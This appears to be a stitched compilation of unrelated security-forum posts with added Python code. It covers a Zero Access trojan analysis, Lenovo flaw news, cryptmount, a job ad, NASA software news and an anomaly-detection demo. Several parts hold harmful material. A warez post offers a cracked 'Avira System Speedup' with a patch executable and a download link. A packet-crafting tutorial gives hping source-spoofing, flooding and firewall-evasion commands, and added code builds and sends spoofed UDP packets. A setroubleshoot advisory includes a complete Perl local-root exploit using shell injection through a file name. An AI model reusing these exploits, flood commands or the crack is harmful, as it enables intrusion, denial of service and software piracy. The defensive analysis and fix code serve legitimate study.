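The training-period problem the article describes (malicious activity present while the baseline is learned gets "learned" as legitimate) is easy to reproduce with the simplest kind of anomaly detector. The following is an added illustration, not code from the article or from any of the papers it cites: a per-source connection-rate detector that learns mean and standard deviation from training records and flags anything above mean + k*stdev. The hosts, rates, record format and the threshold factor k are constructed assumptions.

```python
from collections import Counter
from statistics import mean, pstdev

# Constructed sample data (not real traffic): one (minute, source_ip) tuple per
# connection attempt seen by a sensor. Three workstations with steady rates and
# one attacker that opens 200 connections a minute.
NORMAL_HOSTS = {"10.0.0.11": 5, "10.0.0.12": 4, "10.0.0.13": 6}
ATTACKER = "10.0.0.200"


def connections(minute, src, count):
    return [(minute, src) for _ in range(count)]


def clean_training():
    """Ten minutes of ordinary traffic: a sane baseline."""
    recs = []
    for minute in range(10):
        for src, n in NORMAL_HOSTS.items():
            recs += connections(minute, src, n)
    return recs


def poisoned_training():
    """Same ten minutes, but the attacker was already flooding while the
    baseline was learned: the failure mode the article warns about."""
    recs = clean_training()
    for minute in range(10):
        recs += connections(minute, ATTACKER, 200)
    return recs


def later_window():
    """One later minute with the three workstations plus the attacker."""
    recs = []
    for src, n in NORMAL_HOSTS.items():
        recs += connections(10, src, n)
    return recs + connections(10, ATTACKER, 200)


def per_source_rates(records):
    """(minute, src) -> number of connections that source made in that minute."""
    return Counter(records)


def learn_baseline(training_records):
    """'Training' for a rate-based anomaly detector: mean and population
    standard deviation of the per-source, per-minute connection counts."""
    rates = list(per_source_rates(training_records).values())
    return mean(rates), pstdev(rates)


def detect(records, baseline, k=3.0):
    """Flag (minute, src, rate) whose rate exceeds mean + k * stdev.
    k trades false positives against missed attacks; it is the tuning knob
    the article complains about."""
    mu, sigma = baseline
    threshold = mu + k * sigma
    return sorted((minute, src, rate)
                  for (minute, src), rate in per_source_rates(records).items()
                  if rate > threshold)


if __name__ == "__main__":
    print("clean baseline   :", detect(later_window(), learn_baseline(clean_training())))
    print("poisoned baseline:", detect(later_window(), learn_baseline(poisoned_training())))
```

With the clean baseline the attacker's 200 connections per minute sit far above the threshold of roughly 7.5 and are flagged; with the poisoned baseline the mean rises to about 54 and the standard deviation to about 84, the threshold climbs above 300, and the same flood passes as normal. Lowering k to catch it would start flagging ordinary hosts instead, which is the false-positive side of the same trade-off.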
  9. The Zero Access trojan (Max++, Sirefef, Crimeware) has affected millions of computers worldwide and is the number one cause of click fraud and Bitcoin mining on the Internet. Once the trojan has been delivered onto a system, it begins to download many other types of malware, each of which can cause a great deal of damage to an organization. The trojan's primary infection vectors are spam mail and exploit kits, but it is also distributed through P2P file-sharing services and fake cracks and keygens. The trojan is unique in that it joins a P2P botnet, which makes the botnet as a whole very difficult to dismantle. Zero Access is a trojan rootkit that uses advanced cloaking mechanisms to evade detection and capture. It can hide itself from several types of antivirus software, and its presence on a system is extremely difficult to ascertain. It leaves no trace evidence indicating a data breach, and its network communications appear to come from a legitimate system process. Usually the executable resides in the %TEMP% directory of the workstation, and the traffic to external websites consists of encoded HTTP GET and POST requests. Once on the system, Zero Access can carry out a wide variety of tasks, including:

- use the infected computer for click fraud and Bitcoin mining
- open the door to many other types of malware infecting the system
- hide itself within the system without being detected
- extract victim information including name, hostname, machine name, account name, etc.

Analysis

Zero Access malware can be downloaded from kernelinfo.com. In this case, the malware was downloaded intentionally for analysis. As in all analysis, the first step is to isolate the affected system. After this, the entire system is scanned for malicious content. At first glance nothing concrete was found, but on further analysis a file was found in the %TEMP% directory of the infected workstation.
Another suspicious file was also found within the %SYSTEM% directory on the workstation. This file appeared to be a configuration file of some kind, and it was protected using ACL permissions. The executable was extracted and run in a sandbox, which confirmed the network indicators. The results also clearly indicated that the file was the dropper component of the Zero Access trojan. The name of the file was found to be fvshis.sav, and its contents are encrypted. The strings of the executable were extracted from memory, and several artifacts were found confirming that the dropper received was the 32-bit version of the Max++ dropper component. The dropper component was then analyzed; at first glance the file appears to be unpacked. However, static analysis showed that the file is packed using a complex custom packer. The executable also employs a complex anti-debugging scheme to further complicate analysis. The INT 2 signal is an operating system interrupt that lets the program be debugger-aware, i.e. the program can detect that it is being analyzed by a debugger and kill itself. This hinders the analysis of such executables. The packing scheme employed by this trojan is also very complex, as it uses several layers of crypting and packing. The unpacking works in chunks, with each chunk carrying a line of anti-debugging code; the dropper continues to unpack itself in this manner until the entire file has been unpacked. If an analyst tries to break into the cycle with a debugger, the executable crashes the debugger. With considerably more effort the sample was unpacked, and it was found that the sample attempts to access several directories on the host computer. From the use of the INT 2 instruction in the code, we conclude that the sample is a ring-zero rootkit, i.e. it runs in kernel mode.
Memory analysis of the sample showed that it creates a mutex in memory. Malware uses such mutexes to ensure the system is not re-infected with the same sample. The trojan was found to have injected itself into a legitimate process (explorer.exe), which it uses to execute its payload. Kernel-mode artifacts were then looked for in memory, and it was found that the sample had hidden itself in the system as a kernel module: the trojan disguises itself as a device driver in kernel memory. The driver is called B48DADF8.sys; dump this module for further analysis. The suspicious network traffic leaving the infected system, noticed during preliminary analysis, was then examined in greater detail. HTTP requests to one domain in particular were seen. The dropper is clearly trying to contact that domain to download other malware samples onto the infected system, so the domain name was analyzed. The resolved C&C IP address appears to be in Zurich, Switzerland. Swiss law protects the privacy of its citizens to a great extent, which makes the country a popular location for bulletproof hosting providers, and bulletproof hosting is very popular with cybercriminals for their C&C servers. Further analysis showed that the domain actually maps to three different IP addresses, including the one above; all three are in locations with strong privacy laws, and all three have been blacklisted as malicious:

141.8.225.62 (Switzerland)
199.79.60.109 (Cayman Islands)
208.91.196.109 (Cayman Islands)

Although this particular trojan does not steal user information, it generates a large amount of traffic from its click fraud and Bitcoin mining modules.

Recommendations

- Use a firewall to block all incoming connections from the Internet to services that should not be publicly available.
By default, deny all incoming connections and only allow services you explicitly want to offer to the outside world.
- Ensure that programs and users use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administrator-level access is a legitimate application.
- Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack; removing them leaves threats fewer avenues of attack.
- Configure your email server to block or remove email containing file attachments commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
- Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
- Do not click suspicious advertisements and banners while browsing the web.
- Use log analysis tools (SIEM) for greater visibility into file and network changes within your organization.
- Ensure that your antivirus solution is up to date with the latest virus definitions.
- Ensure that your systems are up to date with the latest available patches, particularly for the following vulnerabilities, as this trojan uses them to infect systems: CVE-2006-0003, CVE-2008-2992, CVE-2009-0927, CVE-2009-1671, CVE-2009-1672, CVE-2009-4324, CVE-2010-1885.
- Ensure that your organization uses email gateways to filter spam and mails with malicious attachments.
- Do not click on links in email from unknown sources.
- Do not allow any P2P file sharing software in your corporate network environment.
- Block traffic to the following addresses in your perimeter devices such as firewalls and IDS/IPS solutions: 141.8.225.62, 208.91.196.109, 199.79.60.109.

References

www.symantec.com
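The three C&C addresses above are the only indicators in this write-up that can be matched mechanically, so here is an added example (not part of the original analysis) of doing that: a small matcher that reads firewall log lines, reports every internal host that reached or tried to reach one of the addresses, and emits the corresponding block rules. The key=value log format, the internal addresses and the timestamps are constructed for the example; a denied attempt still counts, since the host that made it is the one to isolate.

```python
import re
from collections import defaultdict

# The three blacklisted C&C addresses quoted in the write-up above.
ZEROACCESS_C2 = {"141.8.225.62", "199.79.60.109", "208.91.196.109"}

# Constructed firewall log lines (not real logs) in a simple key=value format.
# 93.184.216.34 and 8.8.8.8 are benign destinations used as negatives.
SAMPLE_LOG = """\
2015-03-01T10:00:01Z action=allow proto=tcp src=10.1.2.15 spt=49152 dst=93.184.216.34 dpt=80
2015-03-01T10:00:07Z action=allow proto=tcp src=10.1.2.15 spt=49153 dst=141.8.225.62 dpt=80
2015-03-01T10:00:09Z action=allow proto=udp src=10.1.2.40 spt=53021 dst=8.8.8.8 dpt=53
2015-03-01T10:00:12Z action=allow proto=tcp src=10.1.2.40 spt=49201 dst=199.79.60.109 dpt=80
2015-03-01T10:00:15Z action=deny proto=tcp src=10.1.2.15 spt=49154 dst=208.91.196.109 dpt=80
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>\w+) proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+) spt=(?P<spt>\d+) dst=(?P<dst>[\d.]+) dpt=(?P<dpt>\d+)$"
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_c2_contacts(log_text, indicators=ZEROACCESS_C2):
    """Every parsed event whose destination is a known C&C address,
    whether the firewall allowed it or denied it."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["dst"] in indicators:
            hits.append(ev)
    return hits


def hosts_to_isolate(log_text, indicators=ZEROACCESS_C2):
    """Internal source -> sorted list of C&C addresses it touched.
    These are the workstations to pull off the network and image."""
    contacted = defaultdict(set)
    for ev in find_c2_contacts(log_text, indicators):
        contacted[ev["src"]].add(ev["dst"])
    return {src: sorted(dsts) for src, dsts in contacted.items()}


def iptables_block_rules(indicators=ZEROACCESS_C2):
    """Outbound drop rules for the perimeter, one per indicator, as the
    'block traffic to the following addresses' recommendation asks for."""
    return ["iptables -A OUTPUT -d %s -j DROP" % ip for ip in sorted(indicators)]


if __name__ == "__main__":
    for src, dsts in hosts_to_isolate(SAMPLE_LOG).items():
        print("isolate %s (contacted %s)" % (src, ", ".join(dsts)))
    print("\n".join(iptables_block_rules()))
```

Run against the constructed sample, it names 10.1.2.15 (one allowed and one denied contact) and 10.1.2.40, and ignores the two benign connections. Feeding it real logs only requires adjusting LINE_RE to the firewall's format.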
  10. HARDWARE FIRM Lenovo has been accused of offering its customers another free bonus security threat just weeks after the Superfish scandal. The firm has already fixed the problem, but the news, and its description as another "massive security risk", isn't good. Superfish was a scandal for the firm and affected a lot of its hardware. Lenovo disabled the software and took any associated financial losses on the chin. Ultimately, the firm said that it had failed its customers. "We recognise that the software did not meet that goal and have acted quickly and decisively. We are providing support on our forums for any user with concerns," Lenovo said at the time. "Our goal is to find technologies that best serve users. In this case, we have responded quickly to negative feedback and taken decisive actions to ensure that we address these concerns." Today we asked the firm to comment on the findings of IOActive Lab researchers, who accused it of major vulnerabilities and of a system that enables the creation and exploitation of fake credentials and the handing over of system control. IOActive Lab said in a security report (PDF) that the problem has been fixed, but that it had granted attackers the same kind of access as a system update and allowed the execution of code. Attackers could exploit a flaw in Lenovo's certificate authority handling and use it to sign their own executables, which could have a range of capabilities. "Local and potentially remote attackers can bypass signature validation checks and replace trusted Lenovo applications with malicious applications," said the advisory. "These applications will then be run as a privileged user. The System Update downloads executables from the internet and runs them. "Remote attackers who can perform a man-in-the-middle attack can exploit this to swap Lenovo's executables with a malicious executable.
"The System Update uses TLS/SSL to secure its communications with the update server, which should protect against [such] attacks."

In a statement, Lenovo told the INQUIRER that it worked with the security firm after it was notified and patched the problem in April. It added that it appreciates the assistance, explaining that its update fixed all issues. "Lenovo's development and security teams worked directly with IOActive regarding their System Update vulnerability findings, and we value their expertise in identifying and responsibly reporting them," it said. "Lenovo released an updated version of System Update which resolves these vulnerabilities and subsequently published a security advisory in coordination with IOActive. Lenovo recommends that all users update System Update to eliminate the vulnerabilities reported by IOActive."
  11. cryptmount is a utility for GNU/Linux operating systems which allows an ordinary user to mount an encrypted filing system without requiring superuser privileges. It is aimed at recent Linux systems using the 2.6 kernel series. There are currently two main approaches to using encrypted filesystems within the Linux kernel: the cryptoloop device driver, and the device-mapper system using the dm-crypt target. The (older) cryptoloop system grew in parallel with the loopback device driver of the 2.4 kernel series, but has now been superseded by the device-mapper capabilities of the 2.6 kernel series. The newer devmapper system offers a cleaner organization of encryption and device access, and superior performance has been noted. Alternative user-space tools which allow individual files to be encrypted are also widely available, but they expose some information about file sizes and organization. With the older cryptoloop system, it was possible to describe all the details of an encrypted filesystem within /etc/fstab so that it could be configured completely by 'mount'. This meant that it was particularly easy to give any user permission to mount those encrypted filesystems simply by providing the 'user' option within /etc/fstab. With the newer device-mapper infrastructure there are more stages involved in mounting an encrypted filing system; 'mount' does not currently handle them, and the syntax of /etc/fstab does not lend itself to describing all the necessary filesystem parameters. This is especially so if the filesystem is stored in an ordinary file, which requires separate configuration of a loopback device and a devmapper target before the filesystem can be accessed. cryptmount was written to make it as easy for ordinary users to access encrypted filesystems on demand using the newer devmapper mechanism as it was to use the older, now deprecated, cryptoloop methods.
This offers the following advantages:
- access to improved functionality in the kernel
- transparent support for filesystems stored on either raw disk partitions or loopback files
- separate encryption of filesystem access keys, allowing access passwords to be changed without re-encrypting the entire filesystem
- storing multiple encrypted filesystems within a single disk partition, using a designated subset of blocks for each
- rarely used filesystems do not need to be mounted at system startup
- un-mounting of each filesystem is locked so that it can only be performed by the user that mounted it, or the superuser
- encrypted filesystems compatible with cryptsetup
- encrypted access-keys can be chosen to be compatible with openssl, or managed via libgcrypt, or (for the 2.0 release series) built-in SHA1/Blowfish ciphers
- support for encrypted swap partitions (superuser only)
- support for setting up encrypted filesystems or crypto-swap at system boot-up

Link: cryptmount.sourceforge.net
  12. Avira System Speedup 1.6.2.120 + Patch.rar

Avira System Speedup is a comprehensive, full-featured software tool that will help you keep your system free of all unnecessary files. Junk files, obsolete registry entries, temporary files, web history, traces and logs... they only take up too much of your computer's valuable space, slow down its performance and are a constant threat to your privacy. This fast and efficient tool can get rid of them all in a snap. System Speedup comes wrapped in an attractive and well-structured interface. Together with a first section that offers you statistical information about your system, the program's main set of tools is divided into two big groups: System Cleaner and System Optimizer. All scanning processes are performed at high speed, producing clear and detailed results.

Salient features: deep scan, Disk Doctor to the rescue, customize or automate, process manager, monitor driver, disk analyzer, registry cleaner & junk file, startup manager, uninstaller, system optimizer, disk wiper, smart defragmenter & many more...

Steps to get the full version: download and install Avira System Speedup; close the program after the first run; run avirasystemspeedup_patch.exe; open it and click the Patch button. That's all, you are done!! Enjoy

https://www.sendspace.com/file/mqmhcs
  13. We are hiring a Linux System Administrator in Bucharest. Schedule Mon-Fri 8-17. Salary negotiable. Those interested can send me their CVs by private message, or by email at hackyard@yahoo.com
  14. Packet crafting is the art of creating a packet according to specific requirements in order to carry out attacks and exploit vulnerabilities in a network. It is mainly used to penetrate a network's structure. Various vulnerability assessment tools can craft such packets. As a coin has two sides, these tools can also be used by hackers to find the vulnerabilities of a targeted system. Crafting is a technically advanced and complex type of vulnerability exploitation, and it is difficult to detect and diagnose.

Steps Involved in Packet Crafting

The idea behind crafting is to simulate an attack and to identify the properties of a network. Crafted packets are commonly used to get past firewalls and intrusion detection software. The steps involved in packet crafting are:

Packet Assembly: This is the first step. The attacker selects the network to be cracked, collects the available vulnerability information and creates the packet. The packet should be designed so that it is invisible while passing through the network; for example, the source address could be spoofed before it is sent.

Packet Editing: In this step the packets are tested before sending. They are edited so that the maximum information can be retrieved by injecting the minimum number of packets.

Packet Playing: When the packets are ready, packet playing sends them to the targeted machine and collects the resulting packets for further analysis. If the required information is not obtained, the attacker goes back to the editing phase and modifies the packet to obtain the required result.

Packet Analysis: The packets that come back are received by the attacker and analyzed to extract the information. Sniffing tools such as Wireshark, tcpdump, dsniff, etc. are used for this purpose.
This step gives a route into the targeted system, or at least gives attackers enough data to tune the attack.

Tools for Packet Crafting: Hping, Nemesis, Netcat, Scapy, Socat

Let's carry out a test to understand the creation and working of a crafted packet and its effect on a firewall.

Test Requirements
Two machines (one with Hping and the other with Snort installed).
A working connection between the two machines.

Hping: a utility that assembles and sends ICMP, UDP or TCP packets and then displays the results. It is similar to the ping command but offers far more options to customize the packet to be sent. This helps to map the firewall rules of a targeted system.

Snort: free network intrusion detection and prevention software. It performs real-time traffic analysis, packet logging, protocol analysis, content searching, etc. on a network.

Testing

Figure 1: Packet Crafting test setup

Now we are going to check how a packet can be crafted from a system using Hping and how it can be customized to be invisible on a network. We are using Snort as the IDS on the target machine. This should show that packet crafting is a serious issue that must be studied to prevent attacks. First install Hping on the source machine. It is command-line, multi-platform software; we are using two Linux machines for the test. The installation package can be downloaded from various websites. The next step is to install the intrusion detection software at the destination end: download the latest version of Snort, with WinPcap, and install it on the machine. WinPcap is a driver that helps in collecting packets. After setting up the two machines, establish a connection between them to transfer the packets, and check the connection before sending any. These are the steps to set up the test environment. Now we have to craft the packet using Hping. Hping has various arguments to modify the packet to be sent according to the requirement.
These can be found in the Hping manual page. Before sending the packet, determine the address of the target machine; here it is 192.168.0.10. Now write the command for packet creation. Hping is command-line software, and for creating packets the commands must be given precisely so that the packet reaches the targeted system without being detected. An example:

hping 192.168.0.10 --udp --spoof 192.168.1.150

The packets are sent to a UDP port of machine 192.168.0.10 with a spoofed source IP of 192.168.1.150.

Figure 2: Spoofing to UDP port.
Figure 3: Spoofed address on target system hiding original address

Packet crafting can be used to carry out DoS attacks against a targeted machine by flooding a predetermined port with packets. The number of packets reaching the port exceeds what that port can handle; the system fails and finally stops responding to any request made to it.

Port Scanning

Before sending a packet to the system, Hping can be used to carry out a port scan. This gives the attacker information on the available open ports so the attack can be carried out more easily; the weakest port is selected to gain access to the system.

hping3 -S 192.168.0.10 -p 80 -c 2

This command scans port 80 of the machine with IP 192.168.0.10. There are also commands to scan all the ports of a machine, which gives the attacker the complete status of the ports on a system.

hping 192.168.0.10 -S -p 22 --rand-source --flood

This command floods port 22 of the target machine. As the flooding starts, the machine becomes non-responsive; when the flooding is stopped, the machine returns to its normal state.

Figure 4: Command for flooding a machine
Figure 5: Result displayed by Snort after flooding.

We can see from the above image that a large number of packets were dumped on the targeted machine within a short time.
The IDS software does not detect the packets while the flooding is in progress; as soon as the flooding stops, Snort displays only the number of packets received. The system cannot handle the traffic created by the flood and becomes non-responsive. No signatures are generated during the process.

DNS and ICMP Packet Crafting

The Domain Name System is responsible for resolving domain names. DNS uses UDP port 53 for normal operations and can use TCP port 53 for zone transfers and other oversized replies. Once an address is entered into the URL bar, the browser tries to resolve the IP; if the address is not known, a DNS request is sent to the DNS server configured on the client. We can craft such a packet using Hping so that the firewall does not block it.

hping -2 -p 53 -E data.dns -d 31 192.168.0.10

Here the packet is sent to port 53 of the target (192.168.0.10), carrying the contents of a file called "data.dns". The packet size has been specified as 31.

Figure 6: Sending a file to target's DNS port

When sending a data file through Hping, the IDS on the target machine does not detect the presence of the attached file; it only displays the total number of packets transmitted and received. Even though it shows "unreachable", the packets are received at the target. Hping can also be used to send ICMP (Internet Control Message Protocol) packets. ICMP packets are usually used to troubleshoot networks and gather basic information, for example to check whether a host is alive. Most firewalls let packets like ICMP and DNS requests pass, so crafted ICMP packets can be used to get through the firewall. At the sender's end we have to specify the type of packet, the destination and other details for proper communication.
hping 192.168.0.11 -d 100 --icmp --file /data.dns

Here the file "data.dns" is sent to the target 192.168.0.11 inside ICMP packets.

Figure 7: File sent using ICMP packet

Using such crafted packets, a firewall can be breached. From the above test we can agree that packet crafting is a serious issue that should be taken care of.

References
Snort: 5 Steps to Install and Configure Snort on Linux
LINUX HELP ALL: Installing and Configuring Snort on RedHat/CentOS v5.5
Cyber Attacks Explained: Packet Crafting - Open Source For You
Article: Cyber Security Packet crafting: Ethical Hacking Penetration Test Pune, India - Valency Networks
Tools for creating TCP/IP packets | Linux Blog
http://www.securitybistro.com/?p=8881
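To see what a source-spoofed UDP packet like the one produced by `hping 192.168.0.10 --udp --spoof 192.168.1.150` actually looks like on the wire, here is an added example that is not part of the original article and not Hping's code: the IPv4 and UDP headers are assembled by hand, including both checksums, so the packet can be built and checked offline. Sending it needs a raw socket and root, so that part is kept in the guarded main block. The source port, destination port, TTL and IP identification are assumed values; Hping picks its own.

```python
import socket
import struct


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum used by both IPv4 and UDP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, payload_len, proto=socket.IPPROTO_UDP, ident=0x1234, ttl=64):
    """20-byte IPv4 header with no options; src is whatever we claim it is."""
    ver_ihl = (4 << 4) | 5
    total_len = 20 + payload_len
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len, ident, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    # Checksum is computed with the checksum field zeroed, then patched in.
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_udp(src, dst, sport, dport, payload):
    """UDP header + payload; the checksum covers a pseudo-header with the
    (spoofed) source address, so spoofing changes this checksum too."""
    length = 8 + len(payload)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_UDP, length)
    udp = struct.pack("!HHHH", sport, dport, length, 0) + payload
    csum = checksum(pseudo + udp) or 0xFFFF   # 0 means "no checksum" in UDP
    return udp[:6] + struct.pack("!H", csum) + udp[8:]


def craft_spoofed_udp(spoofed_src, dst, sport=1024, dport=53, payload=b""):
    """The equivalent of hping's --udp --spoof: IP header claiming spoofed_src."""
    udp = build_udp(spoofed_src, dst, sport, dport, payload)
    return build_ipv4_header(spoofed_src, dst, len(udp)) + udp


def addresses(packet):
    """(source, destination) as the receiver will see them."""
    return socket.inet_ntoa(packet[12:16]), socket.inet_ntoa(packet[16:20])


def ip_header_valid(packet):
    """A correct IPv4 header sums to zero when the checksum field is included."""
    return checksum(packet[:20]) == 0


def udp_checksum_valid(packet):
    udp = packet[20:]
    pseudo = struct.pack("!4s4sBBH", packet[12:16], packet[16:20], 0,
                         socket.IPPROTO_UDP, len(udp))
    return checksum(pseudo + udp) == 0


def send_raw(packet, dst):
    """Requires CAP_NET_RAW (root). On Linux IPPROTO_RAW implies IP_HDRINCL,
    so the kernel sends our header unchanged, spoofed source and all."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(packet, (dst, 0))


if __name__ == "__main__":
    pkt = craft_spoofed_udp("192.168.1.150", "192.168.0.10")
    print(pkt.hex())
    print("claims to come from %s, going to %s" % addresses(pkt))
```

Two things the hex dump makes concrete: nothing in the packet identifies the real sender, which is why the target in Figure 3 logs 192.168.1.150; and any reply goes to the spoofed address, so this is fire-and-forget, which is exactly what the flooding commands above rely on. Egress filtering that drops packets whose source is not in the local network (BCP 38) is the usual defence on the sending side.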
  15. setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain). In util.py we have: 266 def get_rpm_nvr_by_file_path_temporary(name): 267 if name is None or not os.path.exists(name): 268 return None 269 270 nvr = None 271 try: 272 import commands 273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name) 274 if rc == 0: 275 nvr = output 276 except: 277 syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name) 278 return nvr (and other similar occurences) So. Yes, thats correct: The SELinux system that is only there to protect you, passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html) inside a daemon running as root. Sacken lassen... I attached a PoC which uses networkmanager's openvpn plugin to execute arbitraty commands by triggering an access violation to a pathname which contains shell commands. The setroubleshootd_t domain has quite a lot of allowed rules and transitions, so this can clearly count as privilege escalation. Furthermore a lot of admins run their system in permissive mode (full root) even when its shipped enforcing by default. Also note that there are potentially remote vectors, if attackers can control part of the filenames being created (web uploads, git, scp, ftp etc). Sebastian PS: I am all for SELinux but theres something on the wrong way. I counted the LOC, and the core SELinux (kernel) has a smaller codebase than whats framed around in python, running as root and mangling attacker controlled input. IOW, the system that wants to protect you has fewer code enforcing the rules than code that potentially blows up your system. And that code is python, so let alone all the python modules and interpreter hat can have bugs on its own. 
Driving such a lane _can only lead to the abyss_. And I am not saying that evil powers are creating an overly complex system to better hide their bugdoors within.

PPS: bug-logo will follow

--
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer () suse de - SuSE Security Team

#!/usr/bin/perl
#
# Fedora21 setroubleshootd local root PoC
#
# (C) 2015 Sebastian Krahmer
#
# - requires polkit authorization to add/mod VPN connections
#   to NetworkManager (default on desktop user)
# - after execution of this script, which adds appropriate
#   NM connection entries, try
#
#   $ nmcli c up vpn-FOOBAR
#
#   a couple of times, until you see:
#
#   logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:...
#
#   in the journalctl logs
#
# PS: I know in advance what the SELinux developers will say...
#
# I say: lulz!

# create a pathname that setroubleshootd will eventually
# query sh -c { rpm -qf ... with, fucking up ' escaping. So the
# embedded pathname is then evaluated as command
#
# There goes your NSA-grade SELinux security!!!

$file = "/tmp/foo.pem';`id|logger`;echo '";

open(O, ">", $file) or die $!;
close O;

# add connection
system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn");

open(O,"|nmcli c edit vpn-FOOBAR") or die $!;
print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\n";
print O "set vpn.secrets password=1\nsave\nquit\n";
close(O);

print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n";

Source
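The quoting defect in the util.py excerpt above, beside the shell-free form that closes it, as an added example that is neither setroubleshoot's code nor the PoC: `echo` stands in for `rpm` in the demonstration so it runs harmlessly on any host, and the file name is a constructed one in the same shape as the report's.

```python
"""Added example (not setroubleshoot's code): the single-quote pasting bug
from get_rpm_nvr_by_file_path_temporary(), and the argv-based replacement."""
import os
import shlex
import subprocess
from typing import List, Optional, Sequence


def shell_line(tool: str, name: str) -> str:
    """The vulnerable shape: the path is pasted inside single quotes, so a
    path that itself contains a ' ends the quoting and sh parses the rest
    of the path as further commands."""
    return "%s '%s'" % (tool, name)


def quoted_shell_line(tool: str, name: str) -> str:
    """If a shell string is truly unavoidable, shlex.quote produces a form
    that sh reads back as one literal word whatever the path contains."""
    return "%s %s" % (tool, shlex.quote(name))


def argv_for(tool: str, name: str, options: Sequence[str] = ()) -> List[str]:
    """The proper fix: an argv list. No shell is involved, so the path is
    exactly one argument to the tool regardless of quotes, backticks or ;."""
    return [tool, *options, name]


def run_shell(line: str) -> str:
    # What commands.getstatusoutput() does underneath: hand the string to sh -c.
    return subprocess.run(["sh", "-c", line], capture_output=True, text=True).stdout


def run_argv(argv: List[str]) -> str:
    return subprocess.run(argv, capture_output=True, text=True).stdout


def get_rpm_nvr_by_file_path(name: Optional[str]) -> Optional[str]:
    """Hardened counterpart of the util.py function: same existence check,
    but rpm is invoked with an argv list instead of a shell string."""
    if name is None or not os.path.exists(name):
        return None
    try:
        proc = subprocess.run(argv_for("rpm", name, ("-qf",)),
                              capture_output=True, text=True, check=False)
    except FileNotFoundError:  # rpm is not installed on this host
        return None
    return proc.stdout.strip() if proc.returncode == 0 else None


# Constructed path in the shape the report describes; a harmless echo
# replaces the command the PoC embeds.
DEMO_NAME = "/tmp/foo.pem'; echo INJECTED; echo '"

if __name__ == "__main__":
    print(repr(run_shell(shell_line("echo", DEMO_NAME))))         # a second command ran
    print(repr(run_shell(quoted_shell_line("echo", DEMO_NAME))))  # one literal word
    print(repr(run_argv(argv_for("echo", DEMO_NAME))))            # one literal argument
```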
  16. The Innovative Technology Partnerships Office at NASA's Goddard Space Flight Center in Greenbelt, Maryland, announced the release of its core Flight System (cFS) Application Suite to the public. The cFS application suite is composed of 12 individual Command and Data Handling (C&DH) flight software applications that together create a reusable library of common C&DH functions. The cFS application suite allows developers to rapidly configure and deploy a significant portion of the C&DH software system for new missions, test platforms and prototypes, resulting in reduced schedule and cost. The cFS framework takes advantage of a rich heritage of successful NASA Goddard flight software efforts and addresses the challenges of rapidly increasing software development costs and schedules due to constant changes and advancements in hardware. Flight software complexity is expected to increase dramatically in coming years and the cFS provides a means to manage the growth and accommodate changes in flight system designs. The cFS is currently being used by the Core Observatory of NASA’s Global Precipitation Measurement (GPM) mission, launched on Feb. 27, 2014, from Tanegashima Space Center in Japan, and it has also been used by NASA's Ames Research Center in Moffett Field, California, on their most recent mission, the NASA Lunar Atmosphere and Dust Environment Explorer (LADEE), which launched Sept. 6, 2013. Other centers such as NASA's Marshall Space Flight Center in Huntsville, Alabama, NASA's Glenn Research Center in Cleveland, Ohio, and NASA's Johnson Space Center in Houston are currently using the cFS as well. The core Flight Executive (cFE) and the Operating System Abstraction Library (OSAL) are two cFS components previously released as open source. These two components provide a platform-independent application runtime environment. The 12 applications in this release provide C&DH functionality common to most spacecraft Flight Software (FSW) systems. 
This means the current suite of cFS open source applications now provides a complete FSW system including a layered architecture with user-selectable and configurable features. These architectural features coupled with an implementation targeted for embedded software platforms make the cFS suitable for reuse on any number of flight projects and/or embedded software systems at very significant cost savings. Each component in the system is a separate loadable file and is available to download free of cost at the links listed in the table. The complete cFS software suite will fully support the cFS user community and future generations of cFS spacecraft platforms and configurations. The cFS community expects the number of reusable applications to continue to grow as the user community expands. here we go -> NASA Goddard Releases Open Source Core Flight Software System Application Suite to Public | NASA
